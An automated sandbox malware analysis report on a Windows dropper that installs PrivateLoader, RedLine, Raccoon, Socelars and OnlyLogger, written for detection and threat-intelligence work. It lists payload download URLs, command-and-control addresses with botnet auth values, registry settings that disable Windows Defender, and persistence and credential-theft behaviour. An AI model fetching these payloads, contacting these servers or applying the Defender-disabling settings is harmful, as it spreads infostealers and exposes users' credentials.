onlylogger | fc45728dcdf75985369c218c0386d8b5e3e49fcbce67bf41c02ba31c01300b0a

Analysis

max time kernel
52s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
08-08-2022 06:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe
Size

5.5MB
MD5

d2ee9fe7a5e32b70bb22438049025aa6
SHA1

89f4751d04bd6c30eb41e9d9e5631e758aba6b6b
SHA256

fc45728dcdf75985369c218c0386d8b5e3e49fcbce67bf41c02ba31c01300b0a
SHA512

9858c3d7ae56a233f73a0931a3d42e401ed30d4204fb06617e95299f199d421067766e83db164955dbfa14fa6dcd40192c4db5550f67cc14b09b1306934af9ee

Score

10^/10

onlylogger privateloader raccoon redline socelars 839b5f035af17fe32dbee0ca113be5fc chris lyla.04.08 media25 top1 aspackv2 evasion infostealer loader main persistence spyware stealer trojan

Malware Config

Extracted

Family

privateloader

http://45.133.1.107/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

51.178.186.149

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/1004293542186848319/1005419918478540852/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1004293542186848319/1005419885670711407/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

redline

Botnet

chris

194.104.136.5:46013

Attributes

auth_value
9491a1c5e11eb6097e68a4fa8627fda8

Extracted

Family

redline

Botnet

media25

91.121.67.60:23325

Attributes

auth_value
e37d5065561884bb54c8ed1baa6de446

Extracted

Family

raccoon

Botnet

839b5f035af17fe32dbee0ca113be5fc

http://89.185.85.53/

rc4.plain

Extracted

Family

redline

Botnet

top1

pemararslava.xyz:80

Attributes

auth_value
e3ff30d1ffe0ffdb11211b351a0179a1

Extracted

Family

redline

Botnet

Lyla.04.08

185.215.113.216:21921

Attributes

auth_value
7f2bf6f810414d0f2fc0b3b8d54a76ac

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

Tue176fb5acbe4e.exeBEEyeleFDUFEbUwJ87FJsPO6.exeTue175473c2c8157a.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Tue176fb5acbe4e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Tue176fb5acbe4e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Tue176fb5acbe4e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Tue176fb5acbe4e.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	BEEyeleFDUFEbUwJ87FJsPO6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	BEEyeleFDUFEbUwJ87FJsPO6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Tue175473c2c8157a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Tue175473c2c8157a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Tue176fb5acbe4e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	BEEyeleFDUFEbUwJ87FJsPO6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Tue175473c2c8157a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Tue175473c2c8157a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Tue175473c2c8157a.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Tue176fb5acbe4e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	BEEyeleFDUFEbUwJ87FJsPO6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	BEEyeleFDUFEbUwJ87FJsPO6.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Tue175473c2c8157a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Tue176fb5acbe4e.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	BEEyeleFDUFEbUwJ87FJsPO6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	BEEyeleFDUFEbUwJ87FJsPO6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Tue175473c2c8157a.exe

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3280	2124	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5284	2124	rundll32.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4144-356-0x0000000000020000-0x0000000000ACE000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1716-269-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/1716-270-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1812-271-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/1812-274-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1780fd628d8744.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1780fd628d8744.exe	family_socelars

OnlyLogger payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3524-283-0x0000000000660000-0x00000000006AC000-memory.dmp	family_onlylogger
behavioral2/memory/3524-286-0x0000000000400000-0x000000000058E000-memory.dmp	family_onlylogger
behavioral2/memory/3524-333-0x0000000000400000-0x000000000058E000-memory.dmp	family_onlylogger

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\libstdc++-6.dll	aspack_v212_v242

Blocklisted process makes network request 6 IoCs

Processes:

cmd.exeschtasks.exe

flow pid process

21 4024 cmd.exe
36 4024 cmd.exe
42 4024 cmd.exe
50 4024 cmd.exe
53 4024 cmd.exe
215 2200 schtasks.exe
Downloads MZ/PE file

flow	pid	process
21	4024	cmd.exe
36	4024	cmd.exe
42	4024	cmd.exe
50	4024	cmd.exe
53	4024	cmd.exe
215	2200	schtasks.exe

Executes dropped EXE 47 IoCs

Processes:

setup_installer.exesetup_install.exeTue175473c2c8157a.exeTue17f1e3fedead.exeTue1704dd8cbe507b.exeTue1764717dab33f7d.exeTue176fb5acbe4e.exeTue17aa01b7ad9.exeTue17beba4c6a.exeTue170b93e005bfc7.exeTue17ed14d9ee5c3ff8.execmd.exeTue178b91461917e3f4.exeTue170afd12d42ebebc.exeTue1776d0c3c20.exeTue17f183b40bf8f0ac9.exeTue176bbcd87e22b8288.exeTue1764717dab33f7d.tmpcmd.exeTue1764717dab33f7d.exeTue17775f71f24d3bd22.exeTue1764717dab33f7d.tmpTue1704dd8cbe507b.exeTue176bbcd87e22b8288.exeWerFault.exeNiceProcessX64.bmp.exeNiceProcessX64.bmp.exeService.exe.exenewfile.exe.exesetup331.exe.exe911.bmp.exeFenix.bmp.exewam_3.bmp.exed6cc75213b4f19cbc07bb687f4b12dcc.exe.exeMixruzki1.bmp.exeinstalloid.exe6523.exe.exeschtasks.exeBandicam.bmp.exe00.bmp.exereg.exeTrdngAnr6339.exe.exeAjyTbkN.exe.exeSETUP_~2.EXEBEEyeleFDUFEbUwJ87FJsPO6.exe73EJMGJJ582ELDD.exe73EJMGJJ582ELDD.exe

pid	process
3468	setup_installer.exe
4884	setup_install.exe
2676	Tue175473c2c8157a.exe
4668	Tue17f1e3fedead.exe
1028	Tue1704dd8cbe507b.exe
3392	Tue1764717dab33f7d.exe
1364	Tue176fb5acbe4e.exe
3524	Tue17aa01b7ad9.exe
2772	Tue17beba4c6a.exe
2852	Tue170b93e005bfc7.exe
4768	Tue17ed14d9ee5c3ff8.exe
4232	cmd.exe
4544	Tue178b91461917e3f4.exe
5028	Tue170afd12d42ebebc.exe
3732	Tue1776d0c3c20.exe
1268	Tue17f183b40bf8f0ac9.exe
2588	Tue176bbcd87e22b8288.exe
792	Tue1764717dab33f7d.tmp
4024	cmd.exe
2060	Tue1764717dab33f7d.exe
3952	Tue17775f71f24d3bd22.exe
3676	Tue1764717dab33f7d.tmp
1716	Tue1704dd8cbe507b.exe
1812	Tue176bbcd87e22b8288.exe
3816	WerFault.exe
2096	NiceProcessX64.bmp.exe
4408	NiceProcessX64.bmp.exe
1356	Service.exe.exe
2916	newfile.exe.exe
2624	setup331.exe.exe
4516	911.bmp.exe
4500	Fenix.bmp.exe
1900	wam_3.bmp.exe
4524	d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
4432	Mixruzki1.bmp.exe
2772	installoid.exe
2308	6523.exe.exe
2200	schtasks.exe
2864	Bandicam.bmp.exe
4144	00.bmp.exe
2184	reg.exe
5148	TrdngAnr6339.exe.exe
5304	AjyTbkN.exe.exe
5384	SETUP_~2.EXE
5592	BEEyeleFDUFEbUwJ87FJsPO6.exe
5996	73EJMGJJ582ELDD.exe
6040	73EJMGJJ582ELDD.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exemshta.exeTue175473c2c8157a.exesetup331.exe.exeService.exe.exeBEEyeleFDUFEbUwJ87FJsPO6.exesetup_installer.exeTue17beba4c6a.exeTue1764717dab33f7d.tmpcmd.exeTue176fb5acbe4e.exe911.bmp.exeFC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	Tue175473c2c8157a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	setup331.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	Service.exe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	BEEyeleFDUFEbUwJ87FJsPO6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	Tue17beba4c6a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	Tue1764717dab33f7d.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	Tue176fb5acbe4e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	911.bmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation	FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe

Loads dropped DLL 10 IoCs

Processes:

setup_install.exeTue1764717dab33f7d.tmpTue1764717dab33f7d.tmprundll32.exemsiexec.exerundll32.exe

pid	process
4884	setup_install.exe
4884	setup_install.exe
4884	setup_install.exe
4884	setup_install.exe
4884	setup_install.exe
792	Tue1764717dab33f7d.tmp
3676	Tue1764717dab33f7d.tmp
1968	rundll32.exe
1396	msiexec.exe
5192	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

installoid.exewam_3.bmp.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Installoid = "\"C:\\Program Files (x86)\\Installoid\\installoid.exe\""	installoid.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	wam_3.bmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	wam_3.bmp.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

95 ipinfo.io
96 ipinfo.io
116 ipinfo.io
202 ipinfo.io
228 ipinfo.io
25 ip-api.com
71 freegeoip.app
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
95	ipinfo.io
96	ipinfo.io
116	ipinfo.io
202	ipinfo.io
228	ipinfo.io
25	ip-api.com
71	freegeoip.app

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17f1e3fedead.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17f1e3fedead.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

00.bmp.exe

pid process

4144 00.bmp.exe
4144 00.bmp.exe

pid	process
4144	00.bmp.exe
4144	00.bmp.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

Tue1704dd8cbe507b.exeTue176bbcd87e22b8288.exereg.exe73EJMGJJ582ELDD.exe

description	pid	process	target process
PID 1028 set thread context of 1716	1028	Tue1704dd8cbe507b.exe	Tue1704dd8cbe507b.exe
PID 2588 set thread context of 1812	2588	Tue176bbcd87e22b8288.exe	Tue176bbcd87e22b8288.exe
PID 2184 set thread context of 5148	2184	reg.exe	TrdngAnr6339.exe.exe
PID 5996 set thread context of 6040	5996	73EJMGJJ582ELDD.exe	73EJMGJJ582ELDD.exe

Drops file in Program Files directory 5 IoCs

Processes:

d6cc75213b4f19cbc07bb687f4b12dcc.exe.exeinstalloid.exeService.exe.exe

description	ioc	process
File created	C:\Program Files (x86)\Installoid\installoid.exe	d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
File opened for modification	C:\Program Files (x86)\Installoid\installoid.exe	d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
File created	C:\Program Files (x86)\Installoid\config.json	installoid.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.exe.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.exe.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 33 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3096	4884	WerFault.exe	setup_install.exe
2768	3524	WerFault.exe	Tue17aa01b7ad9.exe
3824	3524	WerFault.exe	Tue17aa01b7ad9.exe
3360	1968	WerFault.exe	rundll32.exe
3460	3524	WerFault.exe	Tue17aa01b7ad9.exe
2480	3524	WerFault.exe	Tue17aa01b7ad9.exe
1528	3524	WerFault.exe	Tue17aa01b7ad9.exe
1300	3524	WerFault.exe	Tue17aa01b7ad9.exe
1280	3524	WerFault.exe	Tue17aa01b7ad9.exe
556	3524	WerFault.exe	Tue17aa01b7ad9.exe
1528	3524	WerFault.exe	Tue17aa01b7ad9.exe
5228	4432	WerFault.exe	Mixruzki1.bmp.exe
5732	4432	WerFault.exe	Mixruzki1.bmp.exe
5912	4432	WerFault.exe	Mixruzki1.bmp.exe
6100	4432	WerFault.exe	Mixruzki1.bmp.exe
2596	4432	WerFault.exe	Mixruzki1.bmp.exe
644	2276	WerFault.exe	rundll32.exe
4460	4432	WerFault.exe	Mixruzki1.bmp.exe
5752	4432	WerFault.exe	Mixruzki1.bmp.exe
6028	4432	WerFault.exe	Mixruzki1.bmp.exe
2192	4432	WerFault.exe	Mixruzki1.bmp.exe
5476	5992	WerFault.exe	mixinte.bmp.exe
5244	5992	WerFault.exe	mixinte.bmp.exe
6328	5992	WerFault.exe	mixinte.bmp.exe
6660	5992	WerFault.exe	mixinte.bmp.exe
6924	2200	WerFault.exe	bezon.bmp.exe
7060	5992	WerFault.exe	mixinte.bmp.exe
6288	5992	WerFault.exe	mixinte.bmp.exe
5380	5992	WerFault.exe	mixinte.bmp.exe
6356	5992	WerFault.exe	mixinte.bmp.exe
6656	5992	WerFault.exe	mixinte.bmp.exe
4792	376	WerFault.exe	8170.exe
3156	6588	WerFault.exe	B0A1.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

6523.exe.exeTue1776d0c3c20.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue1776d0c3c20.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue1776d0c3c20.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue1776d0c3c20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6523.exe.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6652 schtasks.exe
5608 schtasks.exe
5600 schtasks.exe
6896 schtasks.exe
32 schtasks.exe
2200 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1900 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

5168 tasklist.exe
6080 tasklist.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5160 taskkill.exe
6772 taskkill.exe
5720 taskkill.exe
4500 taskkill.exe
2624 taskkill.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

6340 PING.EXE
5524 PING.EXE
1300 PING.EXE
4548 PING.EXE

pid	process
6652	schtasks.exe
5608	schtasks.exe
5600	schtasks.exe
6896	schtasks.exe
32	schtasks.exe
2200	schtasks.exe

pid	process
1900	timeout.exe

pid	process
5168	tasklist.exe
6080	tasklist.exe

pid	process
5160	taskkill.exe
6772	taskkill.exe
5720	taskkill.exe
4500	taskkill.exe
2624	taskkill.exe

pid	process
6340	PING.EXE
5524	PING.EXE
1300	PING.EXE
4548	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	46	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	216	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeWerFault.exeTue1776d0c3c20.exeTue175473c2c8157a.exe

pid	process
4344	powershell.exe
4344	powershell.exe
3396	WerFault.exe
3396	WerFault.exe
4344	powershell.exe
3396	WerFault.exe
3732	Tue1776d0c3c20.exe
3732	Tue1776d0c3c20.exe
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
1184
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe
2676	Tue175473c2c8157a.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Tue1776d0c3c20.exe6523.exe.exe

pid process

3732 Tue1776d0c3c20.exe
2308 6523.exe.exe

pid	process
3732	Tue1776d0c3c20.exe
2308	6523.exe.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Tue178b91461917e3f4.exepowershell.exeWerFault.execmd.exeTue170b93e005bfc7.exeFenix.bmp.exesetup331.exe.exeschtasks.exe

description	pid	process
Token: SeDebugPrivilege	4544	Tue178b91461917e3f4.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeDebugPrivilege	3396	WerFault.exe
Token: SeCreateTokenPrivilege	4024	cmd.exe
Token: SeAssignPrimaryTokenPrivilege	4024	cmd.exe
Token: SeLockMemoryPrivilege	4024	cmd.exe
Token: SeIncreaseQuotaPrivilege	4024	cmd.exe
Token: SeMachineAccountPrivilege	4024	cmd.exe
Token: SeTcbPrivilege	4024	cmd.exe
Token: SeSecurityPrivilege	4024	cmd.exe
Token: SeTakeOwnershipPrivilege	4024	cmd.exe
Token: SeLoadDriverPrivilege	4024	cmd.exe
Token: SeSystemProfilePrivilege	4024	cmd.exe
Token: SeSystemtimePrivilege	4024	cmd.exe
Token: SeProfSingleProcessPrivilege	4024	cmd.exe
Token: SeIncBasePriorityPrivilege	4024	cmd.exe
Token: SeCreatePagefilePrivilege	4024	cmd.exe
Token: SeCreatePermanentPrivilege	4024	cmd.exe
Token: SeBackupPrivilege	4024	cmd.exe
Token: SeRestorePrivilege	4024	cmd.exe
Token: SeShutdownPrivilege	4024	cmd.exe
Token: SeDebugPrivilege	4024	cmd.exe
Token: SeAuditPrivilege	4024	cmd.exe
Token: SeSystemEnvironmentPrivilege	4024	cmd.exe
Token: SeChangeNotifyPrivilege	4024	cmd.exe
Token: SeRemoteShutdownPrivilege	4024	cmd.exe
Token: SeUndockPrivilege	4024	cmd.exe
Token: SeSyncAgentPrivilege	4024	cmd.exe
Token: SeEnableDelegationPrivilege	4024	cmd.exe
Token: SeManageVolumePrivilege	4024	cmd.exe
Token: SeImpersonatePrivilege	4024	cmd.exe
Token: SeCreateGlobalPrivilege	4024	cmd.exe
Token: 31	4024	cmd.exe
Token: 32	4024	cmd.exe
Token: 33	4024	cmd.exe
Token: 34	4024	cmd.exe
Token: 35	4024	cmd.exe
Token: SeDebugPrivilege	2852	Tue170b93e005bfc7.exe
Token: SeDebugPrivilege	4500	Fenix.bmp.exe
Token: SeDebugPrivilege	2624	setup331.exe.exe
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeDebugPrivilege	2200	schtasks.exe
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
